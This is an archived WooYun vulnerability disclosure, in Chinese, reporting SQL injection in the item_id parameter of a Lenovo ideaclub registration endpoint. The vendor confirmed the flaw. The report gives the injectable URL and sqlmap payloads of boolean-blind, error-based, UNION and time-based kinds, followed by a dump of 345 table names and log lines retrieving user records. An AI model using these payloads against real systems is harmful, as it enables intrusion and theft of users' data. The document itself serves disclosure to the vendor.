乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-08-26: 细节已通知厂商并且等待厂商处理中 2013-08-27: 厂商已经确认,细节仅向厂商公开 2013-09-06: 细节向核心白帽子及相关领域专家公开 2013-09-16: 细节向普通白帽子公开 2013-09-26: 细节向实习白帽子公开 2013-10-10: 细节向公众公开
今天联想终于要发礼物了,于是又有动力挖洞了,于是又挖到一个注射!
注射点:
http://ideaclub.lenovo.com.cn/club/index.php?m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b
参数item_id存在注射这次很幸运 是有返回的注射哦!!!
---Place: GETParameter: item_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b' AND 5080=5080 AND 'HEIH'='HEIH Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b' AND (SELECT 8983 FROM(SELECT COUNT(*),CONCAT(0x7162737971,(SELECT (CASE WHEN (8983=8983) THEN 1 ELSE 0 END)),0x716f707271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YRCb'='YRCb Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162737971,0x48416f6e704e75495566,0x716f707271),NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b' AND SLEEP(5) AND 'hKGD'='hKGD---
web application technology: Nginxback-end DBMS: MySQL 5.0
345个表
Database: ideaclub2[345 tables]+------------------------------------+| c_activity_member || c_asset_tbl || c_asset_tbl_content_tbl || c_comment || c_config || c_content_tbl || c_content_tbl_download_tbl || c_content_tbl_system_menu || c_content_tbl_template_tbl || c_dictionary_map || c_dictionary_sort || c_download_tbl || c_evil_ip || c_experience_store || c_expstore || c_goods || c_goods_convert || c_goods_img || c_item_tbl || c_item_tbl_download_tbl || c_keywords || c_m_ad || c_m_campaisn || c_m_media || c_m_tracker || c_member || c_member_action || c_member_action_score || c_member_attention || c_member_bind || c_member_bind_douban || c_member_bind_qq || c_member_bind_renren || c_member_bind_sina || c_member_login_count || c_member_profile || c_member_score || c_member_verifycode || c_member_visit || c_reg_user || c_store_activity_comment || c_store_products || c_system_function || c_system_menu || c_system_menu_function || c_system_menu_template_tbl || c_system_role || c_system_role_function || c_system_user || c_system_user_role || c_template_tbl || f_common_admincp_cmenu || f_common_admincp_group || f_common_admincp_member || f_common_admincp_perm || f_common_admincp_session || f_common_admingroup || f_common_adminnote || f_common_advertisement || f_common_advertisement_custom || f_common_banned || f_common_block || f_common_block_favorite || f_common_block_item || f_common_block_item_data || f_common_block_permission || f_common_block_pic || f_common_block_style || f_common_block_xml || f_common_cache || f_common_card || f_common_card_log || f_common_card_type || f_common_connect_guest || f_common_credit_log || f_common_credit_rule || f_common_credit_rule_log || f_common_credit_rule_log_field || f_common_cron || f_common_devicetoken || f_common_district || f_common_diy_data || f_common_domain || f_common_failedlogin || f_common_friendlink || f_common_grouppm || f_common_invite || f_common_magic || f_common_magiclog || f_common_mailcron || f_common_mailqueue || f_common_member || f_common_member_action_log || f_common_member_connect || f_common_member_count || f_common_member_crime || f_common_member_field_forum || f_common_member_field_home || f_common_member_fivecube || f_common_member_grouppm || f_common_member_log || f_common_member_lottery || f_common_member_magic || f_common_member_medal || f_common_member_profile || f_common_member_profile_setting || f_common_member_profile_update_log || f_common_member_security || f_common_member_stat_field || f_common_member_status || f_common_member_validate || f_common_member_verify || f_common_member_verify_info || f_common_myapp || f_common_myinvite || f_common_mytask || f_common_nav || f_common_onlinetime || f_common_patch || f_common_plugin || f_common_plugin_reminder || f_common_pluginvar || f_common_process || f_common_regip || f_common_relatedlink || f_common_report || f_common_searchindex || f_common_secquestion || f_common_session || f_common_setting || f_common_smiley || f_common_sphinxcounter || f_common_stat || f_common_statuser || f_common_style || f_common_stylevar || f_common_syscache || f_common_tag || f_common_tagitem || f_common_task || f_common_taskvar || f_common_template || f_common_template_block || f_common_template_permission || f_common_uin_black || f_common_usergroup || f_common_usergroup_field || f_common_word || f_common_word_type || f_connect_disktask || f_connect_feedlog || f_connect_memberbindlog || f_connect_postfeedlog || f_connect_tthreadlog || f_forum_access || f_forum_activity || f_forum_activityapply || f_forum_announcement || f_forum_attachment || f_forum_attachment_0 || f_forum_attachment_1 || f_forum_attachment_2 || f_forum_attachment_3 || f_forum_attachment_4 || f_forum_attachment_5 || f_forum_attachment_6 || f_forum_attachment_7 || f_forum_attachment_8 || f_forum_attachment_9 || f_forum_attachment_exif || f_forum_attachment_unused || f_forum_attachtype || f_forum_bbcode || f_forum_collection || f_forum_collectioncomment || f_forum_collectionfollow || f_forum_collectioninvite || f_forum_collectionrelated || f_forum_collectionteamworker || f_forum_collectionthread || f_forum_creditslog || f_forum_debate || f_forum_debatepost || f_forum_faq || f_forum_forum || f_forum_forum_threadtable || f_forum_forumfield || f_forum_forumrecommend || f_forum_groupcreditslog || f_forum_groupfield || f_forum_groupinvite || f_forum_grouplevel || f_forum_groupuser || f_forum_imagetype || f_forum_medal || f_forum_medallog || f_forum_memberrecommend || f_forum_moderator || f_forum_modwork || f_forum_onlinelist || f_forum_order || f_forum_poll || f_forum_polloption || f_forum_pollvoter || f_forum_post || f_forum_post_location || f_forum_post_moderate || f_forum_post_tableid || f_forum_postcache || f_forum_postcomment || f_forum_postlog || f_forum_poststick || f_forum_promotion || f_forum_ratelog || f_forum_relatedthread || f_forum_replycredit || f_forum_rsscache || f_forum_spacecache || f_forum_statlog || f_forum_thread || f_forum_thread_moderate || f_forum_threadaddviews || f_forum_threadclass || f_forum_threadclosed || f_forum_threaddisablepos || f_forum_threadimage || f_forum_threadlog || f_forum_threadmod || f_forum_threadpartake || f_forum_threadpreview || f_forum_threadrush || f_forum_threadtype || f_forum_trade || f_forum_tradecomment || f_forum_tradelog || f_forum_typeoption || f_forum_typeoptionvar || f_forum_typevar || f_forum_warning || f_home_album || f_home_album_category || f_home_appcreditlog || f_home_blacklist || f_home_blog || f_home_blog_category || f_home_blog_moderate || f_home_blogfield || f_home_class || f_home_click || f_home_clickuser || f_home_comment || f_home_comment_moderate || f_home_docomment || f_home_doing || f_home_doing_moderate || f_home_favorite || f_home_feed || f_home_feed_app || f_home_follow || f_home_follow_feed || f_home_follow_feed_archiver || f_home_friend || f_home_friend_request || f_home_friendlog || f_home_notification || f_home_pic || f_home_pic_moderate || f_home_picfield || f_home_poke || f_home_pokearchive || f_home_share || f_home_share_moderate || f_home_show || f_home_specialuser || f_home_userapp || f_home_userappfield || f_home_visitor || f_infbox || f_infbox_setting || f_mobile_setting || f_plugin_wodexunzhang || f_plugin_wodexunzhang_ershou || f_plugin_wodexunzhang_fenlei || f_plugin_wodexunzhang_kucun || f_plugin_wodexunzhang_log || f_plugin_wodexunzhang_user || f_portal_article_content || f_portal_article_count || f_portal_article_moderate || f_portal_article_related || f_portal_article_title || f_portal_article_trash || f_portal_attachment || f_portal_category || f_portal_category_permission || f_portal_comment || f_portal_comment_moderate || f_portal_rsscache || f_portal_topic || f_portal_topic_pic || f_security_evilpost || f_security_eviluser || f_security_failedlog || f_ucenter_admins || f_ucenter_applications || f_ucenter_badwords || f_ucenter_domains || f_ucenter_failedlogins || f_ucenter_feeds || f_ucenter_friends || f_ucenter_mailqueue || f_ucenter_memberfields || f_ucenter_members || f_ucenter_members_csv || f_ucenter_mergemembers || f_ucenter_newpm || f_ucenter_notelist || f_ucenter_pm_indexes || f_ucenter_pm_lists || f_ucenter_pm_members || f_ucenter_pm_messages_0 || f_ucenter_pm_messages_1 || f_ucenter_pm_messages_2 || f_ucenter_pm_messages_3 || f_ucenter_pm_messages_4 || f_ucenter_pm_messages_5 || f_ucenter_pm_messages_6 || f_ucenter_pm_messages_7 || f_ucenter_pm_messages_8 || f_ucenter_pm_messages_9 || f_ucenter_protectedmembers || f_ucenter_settings || f_ucenter_sqlcache || f_ucenter_tags || f_ucenter_vars || ld_member_prize || ld_prize_config || ld_prize_log || ld_prize_setting || ld_prize_test || ld_receive_address || temp_common_member || temp_member || temp_un || tmp_id |+------------------------------------+
188596条用户数据
15:11:37] [INFO] the SQL query used returns 188597 entries[15:11:37] [INFO] retrieved: "1970-01-01 08:00:00","2","[email protected]"," ...[15:11:38] [INFO] retrieved: "1970-01-01 08:00:00","3","[email protected]...[15:11:38] [INFO] retrieved: "1970-01-01 08:00:00","4","[email protected]"," ",...[15:11:39] [INFO] retrieved: "1970-01-01 08:00:00","5","[email protected]"," "...[15:11:40] [INFO] retrieved: "1970-01-01 08:00:00","6","[email protected]"," "...[15:11:40] [INFO] retrieved: "1970-01-01 08:00:00","7","[email protected]"," ...[15:11:40] [INFO] retrieved: "1970-01-01 08:00:00","188","[email protected]"," ...
过滤吧
危害等级:高
漏洞Rank:15
确认时间:2013-08-27 13:54
感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞
暂无